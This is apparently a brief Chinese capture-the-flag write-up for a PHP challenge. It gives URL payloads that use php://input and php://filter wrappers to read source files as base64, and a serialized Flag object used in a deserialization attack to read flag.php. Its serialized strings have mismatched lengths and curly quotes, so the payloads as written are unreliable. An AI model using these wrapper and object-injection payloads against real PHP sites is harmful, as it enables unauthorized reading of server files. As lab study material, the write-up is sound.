1. image.png

    构造伪协议绕过第一个if,
    payload:?txt=php://input&file=php://filter/read=convert.base64-encode/resource=hint.php
    然后通过post数据 ‘GL_ChinaMobile’
    得到base64加密后的hint.php,
    image.png

    发现反序列化漏洞,构造poc
    $usr =new Flag();
    $usr->file=”flag.php”;
    $usr->__tostring();
    echo serialize($usr);
    得到 O:4:”Flag”:1:{s:4:”file”;s:57:”flag.php”;}

    最后继续上传:
    ?txt=php://input&password=O:4:”Flag”:1:{s:4:”file”;s:57:”php://filter/read=convert.base64-encode/resource=flag.php”;}